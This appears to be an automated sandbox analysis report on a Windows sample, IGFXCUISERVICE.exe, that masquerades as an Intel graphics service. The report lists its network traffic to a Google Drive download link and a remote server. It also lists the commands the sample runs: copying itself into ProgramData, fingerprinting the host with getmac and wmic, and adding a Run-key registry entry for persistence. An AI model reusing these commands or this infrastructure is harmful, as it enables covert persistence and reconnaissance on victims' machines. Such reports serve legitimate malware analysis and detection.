Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: doc-0k-2o-docs.googleusercontent.com
Source: global trafficHTTP traffic detected: GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: drive.google.com
Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: doc-0k-2o-docs.googleusercontent.com
Source: global trafficHTTP traffic detected: GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: drive.google.com
Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: WinHttpClientContent-Length: 0Host: doc-0k-2o-docs.googleusercontent.com
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: IGFXCUISERVICE.exe, 00000001.00000002.737000999.00000000014EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Powershell drops PE fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
Source: IGFXCUISERVICE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012C3970
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012CB99E
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012E0192
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012D0820
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012CE852
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012E1F1C
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012CB76C
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012E3780
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012A5230
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012E3660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074F9498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074F9498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9ECA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9DCA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A94AB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A94A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074FC570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074FC580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_074F001E
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002911F0
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_00295230
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D0192
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_00296630
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D3660
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002BB76C
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D3780
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_00296820
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002C0820
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002BE852
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D08A9
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B7960
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002BB99E
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002CDDCF
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D1F1C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080999E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080951E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080999D7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0809AC6F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0809AC98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_080951D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08159DB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08159DB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_085B0DD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_085B7040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08150006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08150040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08158330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08158321
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: String function: 002B51F0 appears 53 times
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: IGFXCUISERVICE.exeVirustotal: Detection: 51%
Source: IGFXCUISERVICE.exeMetadefender: Detection: 20%
Source: IGFXCUISERVICE.exeReversingLabs: Detection: 41%
Source: IGFXCUISERVICE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\IGFXCUISERVICE.exe "C:\Users\user\Desktop\IGFXCUISERVICE.exe"
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic nicconfig where 'IPEnabled = True' get ipaddress
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: unknownProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: unknownProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic nicconfig where 'IPEnabled = True' get ipaddress
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220111Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btj2vhwe.osx.ps1Jump to behavior
Source: temps1.txt.7.drBinary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{BB556C50-98D0-4585-A1ED-B2838757AE1B}
Source: classification engineClassification label: mal92.evad.winEXE@43/21@55/4
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_0029EC90 CoInitialize,CoCreateInstance,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4240:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012A3FB0 LoadResource,LockResource,SizeofResource,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCommand line argument: n`-
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\SystemData\igfxCUIService.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IGFXCUISERVICE.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: IGFXCUISERVICE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IGFXCUISERVICE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IGFXCUISERVICE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IGFXCUISERVICE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IGFXCUISERVICE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
